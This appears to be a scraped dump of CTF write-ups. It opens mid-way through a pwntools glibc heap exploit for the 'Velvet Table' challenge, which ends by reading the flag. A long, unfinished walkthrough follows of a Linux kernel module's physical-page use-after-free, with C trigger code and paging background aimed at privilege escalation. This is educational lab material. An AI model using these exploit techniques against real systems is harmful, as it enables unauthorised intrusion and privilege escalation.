= action_count \u0026amp; 3 action_count += 1 obfuscated = b\u0026#34;\u0026#34; for byte in note: v37 = v6 ^ key1 v6 = (v6 + 0x27D4EB2D) \u0026amp; 0xFFFFFFFFFFFFFFFF mixed = ((v37 \u0026gt;\u0026gt; 0x10) ^ v37) \u0026amp; 0xFF obfuscated += bytes([byte ^ ((0x6b * mixed) \u0026amp; 0xff)]) sa(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;5\\n\u0026#34; + obfuscated) # saturate 0x100 protection, then one more cashout into unsorted bin (UAF preserved) for i in range(7): reserve(15 - i, 0x100) pos = reserve(0, 0x100) reserve(8, 0x180) # guard against top-chunk 
consolidation for i in range(7): cashout(15 - i) # tcache_ctr_0x100 = 7 (saturated) cashout(0) # ptr stays valid; chunk -\u0026gt; unsorted bin reserve(7, 0x180) # walks unsorted, sorts our 0x110 into smallbin bin_head = uu64(inspect(0)[0:8]) # Forge fake chunk on the stack so smallbin consistency check passes: # stack.fd must equal the victim chunk address (= pos - 0x10). fake_chunk = p64(0) + p64(0x110 | 1) + p64(pos - 0x10) + p64(bin_head) dealer_note(fake_chunk) settle() # Rewire the smallbin chunk: bk = stack so the next malloc unlinks through our forgery. update(0, 0x10, p64(bin_head) + p64(stack_addr)) # Drain the 0x100 tcache so the next reserve takes the smallbin path. for i in range(7): reserve(15 - i, 0x100) reserve(0, 0x100) # smallbin unlink + tcache-stash stack_addr reserve(1, 0x100) # pop stack -- tables[1].ptr is stack-aliased content = inspect(1) elf.address = uu64(content[0x10:0x18]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(1, 0x20, b\u0026#34;A\u0026#34; * 0x10 + p64(win) + p64(win_hash)) cashout(15) # parity bump for payout payout() sl(b\u0026#34;ls\u0026#34;) sl(b\u0026#34;cat ./flag.txt\u0026#34;) p.interactive() Flag # UMDCTF{smallbins_still_love_the_stack_when_the_house_sets_the_table} ","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/ctfs/umd-26/velvet-table/","section":"CTFs","summary":"Glibc 2.32+ heap note manager wrapped in heavy XOR obfuscation. 
An inverted size check in the cashout handler turns the dev’s careful tcache bookkeeping into a free UAF, with a slightly longer smallbin attack waiting behind it as the intended path.","title":"Velvet Table","type":"ctfs"},{"content":"","date":"12 March 2026","externalUrl":null,"permalink":"/writeups/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/0xfunctf-26/","section":"CTFs","summary":"","title":"0xfun CTF 2026","type":"ctfs"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/huge-pages/","section":"Tags","summary":"","title":"Huge-Pages","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/kernel/","section":"Tags","summary":"","title":"Kernel","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/mmap/","section":"Tags","summary":"","title":"Mmap","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/modprobe-path/","section":"Tags","summary":"","title":"Modprobe-Path","type":"tags"},{"content":"","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/tags/page-tables/","section":"Tags","summary":"","title":"Page-Tables","type":"tags"},{"content":" The page is freed, but its ghost lingers.\nThe challenge provides a vulnerable kernel module (phantom.ko) running inside a QEMU virtual machine. We get a busybox shell as uid 1000 and need to read /flag, which is root-only. All the standard kernel mitigations are enabled.\nqemu-system-x86_64 -m 256M -kernel ./bzImage -initrd ./initramfs.cpio.gz \\ -append \u0026#34;console=ttyS0 oops=panic panic=1 quiet kaslr\u0026#34; \\ -cpu qemu64,+smep,+smap -monitor /dev/null -nographic -no-reboot Let\u0026rsquo;s break down the QEMU flags:\nFlag Effect -m 256M 256MB physical RAM. 
Small enough that the page allocator\u0026rsquo;s free lists are shallow, which is critical for our page reclamation strategy. -kernel ./bzImage Boots kernel 6.6.15 directly (no bootloader). -append \u0026quot;... kaslr\u0026quot; Enables KASLR. The kernel\u0026rsquo;s virtual and physical base addresses are randomized at boot. -cpu qemu64,+smep,+smap Enables SMEP and SMAP (explained below). -no-reboot Kernel panic = instant VM death. No second chances, no crash-and-retry loops. oops=panic panic=1 Any kernel oops escalates to a panic. Even a non-fatal error (null deref with recovery) kills the VM. Kernel mitigations # KASLR (Kernel Address Space Layout Randomization) randomizes the kernel\u0026rsquo;s virtual and physical base addresses at each boot. This means hardcoded addresses from a local build won\u0026rsquo;t work on the remote—we need to discover addresses dynamically.\nSMEP (Supervisor Mode Execution Prevention) is a CPU feature (controlled via CR4 bit 20) that prevents code running in ring 0 (kernel mode) from executing instructions on pages whose U/S (User/Supervisor) page table bit is set. In other words: the kernel cannot jump to and execute userspace memory. Without SMEP, a classic kernel exploit technique called ret2user works: overwrite a kernel function pointer to point at a userspace buffer containing shellcode, and the kernel happily executes it. SMEP kills this by making the CPU throw a page fault if ring 0 tries to execute a page marked as User. On x86-64 with SMEP, the kernel can only execute code from pages marked Supervisor (i.e., the kernel\u0026rsquo;s own .text section).\nSMAP (Supervisor Mode Access Prevention) is a related CPU feature (CR4 bit 21) that extends the restriction to data accesses: ring 0 cannot read from or write to User-marked pages. 
Without SMAP, even if you can\u0026rsquo;t execute userspace code (thanks to SMEP), you can still trick the kernel into reading attacker-controlled data from userspace—for example, by placing a fake struct in userspace and having the kernel dereference a pointer to it. SMAP closes this gap: any kernel attempt to mov from a User page triggers a fault. The kernel must explicitly toggle SMAP off (via the STAC/CLAC instructions) around legitimate copy_from_user()/copy_to_user() calls.\nTogether, SMEP and SMAP force exploits to work entirely within kernel memory: you can\u0026rsquo;t redirect execution to userspace (SMEP), and you can\u0026rsquo;t feed the kernel fake data from userspace (SMAP). This is why our exploit takes a different approach: rather than corrupting the kernel from inside, we forge our own page table entries to access kernel physical memory from userspace. SMEP/SMAP restrict what the kernel can do with userspace pages. They say nothing about what userspace can do if it manages to create a mapping to kernel physical memory.\nWe\u0026rsquo;re also given interface.h, which defines two ioctl commands:\n#define CMD_ALLOC 0x133701 #define CMD_FREE 0x133702 ioctl (input/output control) is a syscall for sending device-specific commands to a file descriptor — a catch-all for operations that don\u0026rsquo;t fit into read/write/seek:\nint ioctl(int fd, unsigned long request, ...); fd — an open file descriptor (here, /dev/phantom) request — a command number defined by the driver ... — an optional argument (pointer or integer, depends on the command) When userspace calls ioctl(fd, CMD_ALLOC, 0), the kernel looks up the unlocked_ioctl function pointer in the file\u0026rsquo;s file_operations struct and calls it with the command number. The driver inspects the command and does whatever it wants — there\u0026rsquo;s no enforced structure. 
Each driver defines its own protocol.\nThe standard convention is to encode metadata into the command number using macros from \u0026lt;linux/ioctl.h\u0026gt;:\n// Standard convention (this driver doesn\u0026#39;t use it): #define MY_CMD_READ _IOR(\u0026#39;M\u0026#39;, 1, struct my_data) // read from device #define MY_CMD_WRITE _IOW(\u0026#39;M\u0026#39;, 2, struct my_data) // write to device // Encodes: direction (R/W), type (\u0026#39;M\u0026#39;), command number (1/2), argument size This driver doesn\u0026rsquo;t follow that convention. 0x133701 and 0x133702 are raw magic numbers with no encoded metadata. This is technically valid — the kernel doesn\u0026rsquo;t enforce the encoding — but it makes the driver slightly harder to discover via strace or ioctl scanners, since tools that decode standard ioctl numbers will just show the raw hex.\nReversing the module # Relocatable objects and why this matters # Kernel modules (.ko files) are not regular executables. A normal binary (like /usr/bin/ls) has all its addresses resolved by the linker — function calls jump to concrete addresses. A .ko file is a relocatable ELF object: it\u0026rsquo;s compiled but not yet linked to its final address. When the kernel loads the module with insmod, it places the module\u0026rsquo;s code and data at an arbitrary kernel address and then patches all the internal references to use the real addresses. These patches are described by relocation entries in the ELF file.\nThis matters for reversing because if a tool doesn\u0026rsquo;t process the relocation entries, function pointers in structs appear as zeroes — a struct that should say \u0026ldquo;ioctl handler is at function X\u0026rdquo; just shows 0x0000000000000000. Ghidra has historically struggled with .ko files for this reason, though recent versions have improved.\nIDA Pro and Binary Ninja handle .ko relocations well — they apply them automatically. 
When you load phantom.ko in IDA, it resolves the relocations for you: call instructions show the target symbol name (call __free_pages), and struct fields display as proper cross-references rather than zeros. For quick analysis, objdump -d -r also works: -d disassembles the code and -r shows relocation entries inline, so you can see which symbol each call targets without a full disassembler setup.\nThe module is tiny: six functions total, four of which are the driver callbacks.\nThe miscdevice and file_operations structs # init_module and cleanup_module are trivial wrappers:\n__int64 init_module(void) { return misc_register(\u0026amp;phantom_miscdev); // .data+0x5C0 } __int64 cleanup_module(void) { return misc_deregister(\u0026amp;phantom_miscdev); } misc_register() registers a simple character device. It takes a pointer to a miscdevice struct, which tells the kernel three things: what minor number to use, what to name the device file under /dev/, and which functions to call when userspace opens/reads/writes/ioctls the device.\nThe kernel\u0026rsquo;s miscdevice struct definition looks like this:\n// include/linux/miscdevice.h struct miscdevice { int minor; // offset 0x00 (padded to 8 bytes) const char *name; // offset 0x08 const struct file_operations *fops; // offset 0x10 // ... more fields we don\u0026#39;t care about }; To figure out what our module passes to misc_register, we follow the cross-reference from init_module to .data+0x5C0. IDA shows the struct clearly with relocations already resolved:\n.data:0x5C0 db 0FFh ; minor = 0xFF .data:0x5C1 db 7 dup(0) ; (padding) .data:0x5C8 dq offset aPhantom ; → \u0026#34;phantom\u0026#34; .data:0x5D0 dq offset off_2A0 ; → file_operations in .rodata The first 8 bytes are the minor field. Linux identifies device files using two numbers: a major number (which driver handles this device) and a minor number (which specific device within that driver). 
For example, /dev/sda and /dev/sdb share the same major number (8, the SCSI disk driver) but have different minor numbers (0 and 16). You can see these with ls -l /dev/. All misc devices share major number 10, and the minor number distinguishes them from each other. 0xFF (255) means MISC_DYNAMIC_MINOR — \u0026ldquo;I don\u0026rsquo;t care which minor number, just pick any available one.\u0026rdquo; The next two qwords are pointers that IDA has resolved from the ELF relocation entries: aPhantom is the \u0026quot;phantom\u0026quot; string, and off_2A0 points to the file_operations struct in .rodata.\nSo in C, this is equivalent to:\nstruct miscdevice phantom_miscdev = { .minor = MISC_DYNAMIC_MINOR, // 255 → kernel picks a minor number .name = \u0026#34;phantom\u0026#34;, // creates /dev/phantom .fops = \u0026amp;phantom_fops, // → file_operations struct in .rodata }; When the module loads, the kernel calls misc_register(\u0026amp;phantom_miscdev), which creates /dev/phantom. Any time userspace opens, reads, writes, or ioctls that device file, the kernel dispatches to the function pointers in phantom_fops.\nReading the file_operations struct # Now we need to figure out what\u0026rsquo;s in the file_operations struct at .rodata+0x2A0. This struct is how Linux drivers register their callback functions. It has dozens of fields — one for each possible file operation — and the kernel definition looks like (abbreviated):\n// include/linux/fs.h (simplified, showing only relevant fields with offsets) struct file_operations { struct module *owner; // offset 0x00 loff_t (*llseek)(...); // offset 0x08 ssize_t (*read)(...); // offset 0x10 ssize_t (*write)(...); // offset 0x18 // ... 5 more function pointers ... long (*unlocked_ioctl)(...); // offset 0x48 // ... 1 more ... int (*mmap)(...); // offset 0x58 // ... 1 more ... int (*open)(...); // offset 0x68 // ... 1 more ... int (*release)(...); // offset 0x78 // ... many more fields, all NULL in our module ... 
}; Each field is a function pointer (8 bytes on x86-64). Most drivers only implement a handful of operations and leave the rest as NULL (zero). Following IDA\u0026rsquo;s cross-reference from off_2A0, we can see which slots in the struct have function pointers and which are zero. The non-NULL entries at their offsets within the struct:\nOffset file_operations field Target function +0x00 owner __this_module +0x48 unlocked_ioctl phantom_ioctl (.text+0x110) +0x58 mmap phantom_mmap (.text+0x90) +0x68 open phantom_open (.text+0x10) +0x78 release phantom_release (.text+0x30) We match these offsets against the kernel\u0026rsquo;s file_operations definition to identify the field names. Everything between these entries is zeros (NULL). The module only implements four callbacks out of the dozens available:\nCallback Code address What it does open .text+0x10 Called when userspace does open(\u0026quot;/dev/phantom\u0026quot;, ...) release .text+0x30 Called when the last fd to the file is closed unlocked_ioctl .text+0x110 Called when userspace does ioctl(fd, cmd, arg) mmap .text+0x90 Called when userspace does mmap(..., fd, ...) Operations like read, write, poll, llseek, etc. are all NULL, meaning the kernel returns -EINVAL or uses a default handler if userspace tries them.\nOne more thing before we look at the functions. When reversing the four callbacks, you\u0026rsquo;ll notice they all read and write the same address: 0xAC0. This is a global variable — a single pointer that lives for the entire lifetime of the module, shared across all calls. It starts as NULL (zero) and gets set when CMD_ALLOC creates the driver\u0026rsquo;s state struct. I\u0026rsquo;ll call it g_ctx (global context). It points to a small struct that tracks the allocated page, its virtual address, and whether it\u0026rsquo;s been freed. 
We\u0026rsquo;ll see the struct layout once we look at ioctl.\nphantom_open (.text+0x10) # __int64 phantom_open(struct inode *inode, struct file *filp) { return 0; } A stub. Returns success unconditionally. No per-file state is created here—that\u0026rsquo;s deferred to CMD_ALLOC. This means you can open /dev/phantom multiple times, but only one allocation can exist at a time (enforced by the global g_ctx pointer).\nNote that g_ctx is a global (.bss), not a per-file pointer stored in filp-\u0026gt;private_data. This is a design choice (or laziness) that means the driver is effectively single-user: if two processes open /dev/phantom simultaneously, they share the same state. For exploitation this doesn\u0026rsquo;t matter since we\u0026rsquo;re the only user.\nphantom_release (.text+0x30) # __int64 phantom_release(struct inode *inode, struct file *filp) { struct phantom_ctx *ctx = g_ctx; if (g_ctx) { if (!g_ctx-\u0026gt;freed \u0026amp;\u0026amp; g_ctx-\u0026gt;page) { __free_pages(g_ctx-\u0026gt;page, 0); // order 0 = single page } kfree(ctx); g_ctx = NULL; } return 0; } Two kernel functions to understand here:\nkfree(ptr) frees a small heap object that was allocated with kmalloc. This is the kernel\u0026rsquo;s equivalent of userspace free(). It returns the memory to the kernel\u0026rsquo;s slab allocator, which manages small fixed-size allocations (32 bytes, 64 bytes, 128 bytes, etc.) carved out of full 4KB pages. Our 24-byte phantom_ctx struct lives in the kmalloc-32 slab, and kfree returns it there.\n__free_pages(page, order) frees a physical page (or a contiguous block of \\(2^{\\text{order}}\\) pages) back to the kernel\u0026rsquo;s buddy allocator. This is a lower-level allocator than the slab — it manages entire 4KB pages of physical memory. order = 0 means a single page. 
The page argument is a struct page *, the kernel\u0026rsquo;s metadata descriptor for a physical page frame, not a virtual address.\nThese are two different allocators: the slab allocator (kmalloc/kfree) hands out small objects by carving up pages internally, and the buddy allocator (alloc_pages/__free_pages) hands out whole pages directly. Our driver uses both: kmalloc for the 24-byte state struct, alloc_pages for the 4KB data page.\nThe logic has two paths on close. Recall from interface.h that the driver has two ioctl commands: CMD_ALLOC (allocate a page) and CMD_FREE (free the page). These are the commands that userspace sends via ioctl(fd, CMD_ALLOC, 0) and ioctl(fd, CMD_FREE, 0). When CMD_FREE is called, it frees the physical page and sets ctx-\u0026gt;freed = 1 as a flag. The release function checks this flag to decide what to clean up:\nfreed == 1 (userspace already called CMD_FREE): just kfree(ctx) to return the 24-byte struct to the slab, and NULL out g_ctx. The page was already returned to the buddy allocator by CMD_FREE. freed == 0 (userspace never called CMD_FREE): call __free_pages(ctx-\u0026gt;page, 0) to return the page to the buddy allocator, then kfree(ctx) to free the struct. This is correct cleanup for normal usage. The bug isn\u0026rsquo;t here — it\u0026rsquo;s in the interaction between mmap and CMD_FREE, which we\u0026rsquo;ll see in the ioctl handler.\nFrom the struct accesses across all four functions, we can reconstruct the state struct layout:\nstruct phantom_ctx { struct page *page; // offset 0x00: kernel page descriptor pointer unsigned long virt; // offset 0x08: kernel virtual address of the page int freed; // offset 0x10: flag: was CMD_FREE called? int _pad; // offset 0x14: padding to 0x18 (24 bytes) }; The kmalloc call in ioctl requests exactly \\(\\texttt{0x18} = 24\\) bytes, confirming the struct is 24 bytes.\nphantom_ioctl (.text+0x110) # This is the heart of the driver. The full IDA decompilation with types applied. 
A note on the return values: kernel functions return negative errno values on failure. The ones you\u0026rsquo;ll see here:\nConstant Value Meaning -EINVAL -22 Invalid argument (bad command, wrong state) -EEXIST -17 Already exists (page already allocated) -ENOMEM -12 Out of memory (allocation failed) -EFAULT -14 Bad address (used in mmap if remap_pfn_range fails) These are defined in \u0026lt;asm-generic/errno-base.h\u0026gt;. When a syscall returns one of these, the C library translates it: ioctl() returns -1 and sets errno to the positive value (e.g. errno = ENOMEM), which perror() then prints as \u0026ldquo;Cannot allocate memory.\u0026rdquo;\n__int64 phantom_ioctl(struct file *filp, unsigned int cmd) { if (cmd == CMD_ALLOC) { if (g_ctx) return -EEXIST; // kmalloc: allocate 24 bytes of kernel heap memory (zeroed) // This is the kernel equivalent of calloc(1, 24) g_ctx = kmalloc(24, GFP_KERNEL | __GFP_ZERO); if (!g_ctx) return -ENOMEM; // alloc_pages: allocate one physical 4KB page from the buddy allocator // Returns a struct page* (the kernel\u0026#39;s metadata for a physical page frame), // not a usable pointer — we need to convert it to a virtual address below g_ctx-\u0026gt;page = alloc_pages(GFP_KERNEL, 0); // order 0 = single page if (!g_ctx-\u0026gt;page) { kfree(g_ctx); // free the struct we just allocated g_ctx = NULL; return -ENOMEM; } // Convert struct page* → kernel virtual address (explained below) g_ctx-\u0026gt;freed = 0; unsigned long virt = page_to_virt(g_ctx-\u0026gt;page); g_ctx-\u0026gt;virt = virt; // Fill entire 4KB page with 0x41 (\u0026#39;A\u0026#39;) bytes memset(virt, 0x41, 4096); return 0; } else if (cmd == CMD_FREE) { if (!g_ctx || g_ctx-\u0026gt;freed) return -EINVAL; // Return the physical page to the buddy allocator __free_pages(g_ctx-\u0026gt;page, 0); // order 0 = single page g_ctx-\u0026gt;freed = 1; return 0; } else { return -EINVAL; } } The decompilation above is cleaned up for readability. 
In the actual binary, kmalloc appears as kmalloc_trace(kmalloc_caches[5], ...) (an internal variant that takes a slab cache pointer directly), and page_to_virt is inlined as a sequence of arithmetic on vmemmap_base and page_offset_base. The logic is the same.\nLet\u0026rsquo;s look at the key operations in detail.\nCMD_ALLOC — slab allocation and GFP flags:\nThe kmalloc_trace call uses GFP_KERNEL | __GFP_ZERO (\\(\\texttt{0xDC0}\\)). Breaking down the flags:\n$$\\underbrace{\\texttt{GFP_KERNEL}}_{\\texttt{0xCC0}} \\mathbin{|} \\underbrace{\\texttt{__GFP_ZERO}}_{\\texttt{0x100}} = \\texttt{0xDC0}$$\nGFP_KERNEL is the standard allocation flag for kernel code that can sleep—it allows the allocator to reclaim pages, perform I/O, and call into the filesystem if memory is tight. __GFP_ZERO zeroes the memory after allocation, equivalent to kzalloc().\nThe kmalloc_caches[5] index selects the slab cache. In the kernel\u0026rsquo;s kmalloc cache table, index 5 corresponds to kmalloc-32 (the 32-byte cache). So the 24-byte struct gets a 32-byte slab object, with 8 bytes of padding.\nCMD_ALLOC — page allocation:\nThe alloc_pages(0xCC0, 0) call is alloc_pages(GFP_KERNEL, 0) — no __GFP_ZERO this time (the driver fills with 0x41 instead). Order 0 means \\(2^0 = 1\\) page (4KB). alloc_pages() returns a struct page * pointer, the kernel\u0026rsquo;s metadata descriptor for the physical page.\nCMD_ALLOC — why page_to_virt exists:\nalloc_pages() returns a struct page * — but that\u0026rsquo;s not a pointer you can read from or write to. It\u0026rsquo;s a pointer to the kernel\u0026rsquo;s metadata about a physical page (reference count, flags, LRU list pointers, etc.), not the page\u0026rsquo;s actual contents. To actually use the page — fill it with data, copy to it, zero it — the kernel needs a virtual address that maps to that physical memory.\nWhy this indirection? Because the kernel needs to track information about pages separately from the page contents themselves. 
A physical page might be used for userspace memory, page cache, a network buffer, or a page table — the kernel needs metadata for all of them, but the page contents are different in each case. The struct page array is the kernel\u0026rsquo;s bookkeeping; the actual data lives in physical memory accessed through virtual addresses.\nThe conversion from struct page * to a usable virtual address is page_to_virt(). The kernel keeps two key base addresses for this:\nvmemmap_base (typically 0xffffea0000000000): the start of the struct page descriptor array. Physical page 0\u0026rsquo;s descriptor is at \\(\\texttt{vmemmap_base} + 0\\), page 1\u0026rsquo;s at \\(\\texttt{vmemmap_base} + 64\\), etc. (each descriptor is 64 bytes). page_offset_base (typically 0xffff888000000000): the start of the kernel\u0026rsquo;s direct map — a linear mapping of all physical memory into kernel virtual address space. Physical address 0x1000 is accessible at page_offset_base + 0x1000. The conversion is just arithmetic — figure out which page number this descriptor belongs to, then look up that page in the direct map:\n$$\\text{page_number} = \\frac{\\texttt{page} - \\texttt{vmemmap_base}}{64}$$ $$\\text{virt} = \\texttt{page_offset_base} + \\text{page_number} \\times 4096$$\nIn the binary this appears as bit shifts (\\(\\gg 6\\) to divide by 64, \\(\\ll 12\\) to multiply by 4096) rather than multiply/divide, but it\u0026rsquo;s the same math.\nCMD_ALLOC — the 0x41 fill:\nThe memset(virt, 0x41, 4096) fills every byte of the page with 0x41 ('A'). This serves two purposes: it confirms the page is accessible, and it gives us a recognizable sentinel value (0x4141414141414141 when read as a qword) that we can later check to determine whether the page has been reclaimed by someone else.\nCMD_FREE:\nCMD_FREE calls __free_pages to return the page to the buddy allocator, then sets ctx-\u0026gt;freed = 1 — but does not clear ctx-\u0026gt;page. The stale struct page * pointer remains in the struct. 
The freed flag prevents a double-free via another CMD_FREE, and prevents mmap from creating new mappings. But any existing mapping created before the free persists.\nphantom_mmap (.text+0x90) # __int64 phantom_mmap(struct file *filp, struct vm_area_struct *vma) { if (!g_ctx) return -EINVAL; // -22 if (g_ctx-\u0026gt;freed) return -EINVAL; if (!g_ctx-\u0026gt;page) return -EINVAL; unsigned long start = vma-\u0026gt;vm_start; unsigned long size = vma-\u0026gt;vm_end - start; if (size \u0026gt; 0x1000) return -EINVAL; // max one page unsigned long pfn = (g_ctx-\u0026gt;page - vmemmap_base) \u0026gt;\u0026gt; 6; int ret = remap_pfn_range(vma, start, pfn, size, vma-\u0026gt;vm_page_prot); if (ret) return -EFAULT; // -14 return 0; } remap_pfn_range() is a kernel function that creates a direct mapping from a userspace virtual address to a specific physical frame number (PFN). Its legitimate use case is mapping memory that isn\u0026rsquo;t managed by the page allocator — things like:\nHardware MMIO registers: a GPU driver maps the GPU\u0026rsquo;s control registers into userspace so a graphics library can talk to the hardware directly without syscall overhead. DMA buffers: a network or video capture driver allocates a buffer for hardware DMA and maps it into userspace for zero-copy I/O. Firmware regions: mapping BIOS/UEFI tables or other fixed physical memory. The key thing these all have in common: the physical memory being mapped doesn\u0026rsquo;t come from alloc_pages(). It\u0026rsquo;s hardware addresses or reserved memory that the page allocator doesn\u0026rsquo;t know about. That\u0026rsquo;s why remap_pfn_range disables reference counting — when userspace unmaps MMIO memory, the kernel shouldn\u0026rsquo;t try to \u0026ldquo;free\u0026rdquo; the GPU\u0026rsquo;s hardware registers back to the page allocator. They\u0026rsquo;re not the kernel\u0026rsquo;s to free.\nThis driver uses remap_pfn_range on a page that does come from alloc_pages(). 
That\u0026rsquo;s the wrong tool for the job. The correct approach for mapping allocator-managed pages to userspace is vm_insert_page() or simply using a fault handler in vm_operations_struct, both of which properly maintain reference counts. Using remap_pfn_range on an allocator page is a well-known antipattern in kernel driver development, and it\u0026rsquo;s what creates the vulnerability here.\nThe size check allows at most PAGE_SIZE (\\(\\texttt{0x1000} = 4096\\)) — you can\u0026rsquo;t map more than one page through a single mmap call. But one page is all we need.\nThe vulnerability # There\u0026rsquo;s a subtle but critical ordering issue. The mmap handler checks ctx-\u0026gt;freed and refuses to create new mappings after CMD_FREE. But nothing prevents this sequence:\nCMD_ALLOC — allocate a page, freed = 0 mmap() — create a userspace mapping (succeeds because freed == 0) CMD_FREE — free the physical page, set freed = 1 The key thing to understand is that remap_pfn_range and __free_pages are completely independent operations that don\u0026rsquo;t know about each other:\nremap_pfn_range just writes a PTE into the process\u0026rsquo;s page tables: \u0026ldquo;virtual address X maps to physical frame Y.\u0026rdquo; It doesn\u0026rsquo;t lock the page, hold a reference, or register itself anywhere. It\u0026rsquo;s a one-shot write to a page table entry. __free_pages just returns a page to the buddy allocator. It checks the page\u0026rsquo;s reference count, decrements it, and if it hits zero, puts the page on the free list. It doesn\u0026rsquo;t scan every process\u0026rsquo;s page tables to check if someone still has a PTE pointing to this frame. Normally these two operations are kept safe by reference counting: when the kernel creates a mapping to a page (through the normal vm_insert_page path, not remap_pfn_range), it increments the page\u0026rsquo;s refcount. 
So even if the driver calls __free_pages, the refcount is still \\(\u0026gt; 0\\) and the page isn\u0026rsquo;t actually freed until the mapping is also removed.\nBut remap_pfn_range skips the refcount — it was designed for hardware memory that will never be freed, so why bother counting? The consequence is that nothing connects the mapping to the page. The driver can call __free_pages and the page is genuinely freed, while the PTE still sits there in the page tables pointing to the now-free physical frame. The hardware MMU doesn\u0026rsquo;t know or care — it sees a valid PTE and dutifully translates accesses. We have a dangling mapping to freed physical memory.\nint fd = open(\u0026#34;/dev/phantom\u0026#34;, O_RDWR); ioctl(fd, CMD_ALLOC, 0); volatile uint64_t *uaf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); ioctl(fd, CMD_FREE, 0); // uaf[0..511] reads/writes a freed physical page // The page is filled with 0x4141414141414141 from CMD_ALLOC // Once the kernel reuses this page, we see (and can modify) whatever it put there This is a physical page UAF, not a slab UAF. The distinction matters: slab UAFs give you access to a freed slab object (typically 32-2048 bytes inside a slab page), while this gives us access to an entire 4KB physical page. The page can be reused for anything: slab pages, page tables, pipe buffers, file page cache, anonymous memory, etc. We choose what it gets reused for by controlling the allocation pattern after the free.\nBackground: virtual memory and page tables # If you\u0026rsquo;re already comfortable with x86-64 paging, the MMU hardware walk, and huge pages, skip ahead to the exploit strategy.\nWhy paging exists # Every process has its own virtual address space. When your program reads address 0x40000000, the CPU doesn\u0026rsquo;t go to physical RAM byte 0x40000000. 
Instead, the CPU\u0026rsquo;s MMU (Memory Management Unit) translates that virtual address to a physical address using page tables, data structures in physical memory that define the mapping. Different processes have different page tables, so the same virtual address in two processes can point to completely different physical memory. The kernel manages these tables, and the hardware walks them on every memory access.\nThe four-level page table walk # On x86-64, a 48-bit virtual address is split into five fields:\n63 48 47 39 38 30 29 21 20 12 11 0 ┌──────────┬─────────┬─────────┬─────────┬─────────┬──────────┐ │ sign ext │ PGD │ PUD │ PMD │ PTE │ offset │ │ (16 bit) │ (9 bit) │ (9 bit) │ (9 bit) │ (9 bit) │ (12 bit) │ └──────────┴─────────┴─────────┴─────────┴─────────┴──────────┘ Each 9-bit field selects one of 512 entries (since \\(2^9 = 512\\)) in that level\u0026rsquo;s table. Each table is exactly one 4KB page (\\(512 \\times 8 = 4096\\) bytes). The hardware walks the tree:\nCR3 register holds the physical address of the PGD (Page Global Directory, also called PML4) PGD[bits 47:39] gives the physical address of a PUD (Page Upper Directory) page PUD[bits 38:30] gives the physical address of a PMD (Page Middle Directory) page PMD[bits 29:21] gives the physical address of a PTE (Page Table Entry) page PTE[bits 20:12] gives the physical address of the final 4KB data page bits 11:0 are the byte offset within that 4KB page flowchart LR CR3[\"CR3\"] --\u003e PGD[\"PGD\n512 entries\"] PGD --\u003e|\"bits 47:39\"| PUD[\"PUD\n512 entries\"] PUD --\u003e|\"bits 38:30\"| PMD[\"PMD\n512 entries\"] PMD --\u003e|\"bits 29:21\"| PTE[\"PTE\n512 entries\"] PTE --\u003e|\"bits 20:12\"| PAGE[\"4KB\ndata page\"] style CR3 fill:#2d333b,stroke:#444 style PGD fill:#1c3049,stroke:#388bfd style PUD fill:#1c3049,stroke:#388bfd style PMD fill:#5a3a1e,stroke:#d29922 style PTE fill:#1a6334,stroke:#2ea043 style PAGE fill:#6e3630,stroke:#f85149 That diagram shows how a virtual address is 
sliced up to index into each table level. Now let\u0026rsquo;s look at what\u0026rsquo;s inside each table. Each entry is 8 bytes and contains a physical address (of the next-level table or the final page) plus permission and status flags in the low bits. The key flags are:\nBit Name Meaning 0 P (Present) Entry is valid. If clear, accessing this address triggers a page fault. 1 R/W If set, the page is writable. If clear, writes trigger a fault. 2 U/S If set, userspace can access this page. If clear, only kernel mode can. 5 A (Accessed) Set by hardware when the page is read. 6 D (Dirty) Set by hardware when the page is written. 7 PS (Page Size) At the PMD level: if set, this is a 2MB \u0026ldquo;huge page\u0026rdquo; (no PTE level). The physical address is stored in bits 51:12 (for normal 4KB pages) or bits 51:21 (for 2MB huge pages), with the low bits used for flags. Since pages are always aligned to their size (\\(2^{12}\\) for 4KB, \\(2^{21}\\) for 2MB), those low bits are architecturally zero in the address and available for flags.\n2MB huge pages (PMD level) # Normally, each PMD entry points to a PTE page, and each PTE entry points to a final 4KB data page. A single PMD entry governs \\(512 \\times \\text{4KB} = \\text{2MB}\\) of virtual address space. But when the PS bit (bit 7) is set in a PMD entry, the CPU short-circuits: it skips the PTE level entirely and treats the PMD entry as a direct mapping of a 2MB region of physical memory. 
This is why huge pages are exactly 2MB — it\u0026rsquo;s the same amount of address space that one PMD entry normally covers through 512 individual 4KB pages, just mapped as one contiguous block instead.\nflowchart LR subgraph \"Normal (4KB pages)\" PMD1[\"PMD entry\n(covers 2MB)\"] --\u003e PTE1[\"PTE page\n512 entries × 8B = 4KB\"] --\u003e P1[\"512 × 4KB pages\n= 2MB total\"] end subgraph \"Huge page (2MB)\" PMD2[\"PMD entry\n(PS=1)\"] --\u003e P2[\"2MB contiguous\nphysical memory\"] end style PMD1 fill:#5a3a1e,stroke:#d29922 style PTE1 fill:#1a6334,stroke:#2ea043 style P1 fill:#6e3630,stroke:#f85149 style PMD2 fill:#5a3a1e,stroke:#d29922 style P2 fill:#6e3630,stroke:#f85149 The entry format for a 2MB huge page:\nbits 51:21 = physical base address (2MB-aligned, low 21 bits implicit zero) bit 7 = PS = 1 (Page Size, marks this as a huge page) bit 6 = D (Dirty) bit 5 = A (Accessed) bit 2 = U/S (User/Supervisor) bit 1 = R/W (Read/Write) bit 0 = P (Present) So a PMD entry value of physical_address | 0xE7 means: present (bit 0), read-write (bit 1), user-accessible (bit 2), accessed (bit 5), dirty (bit 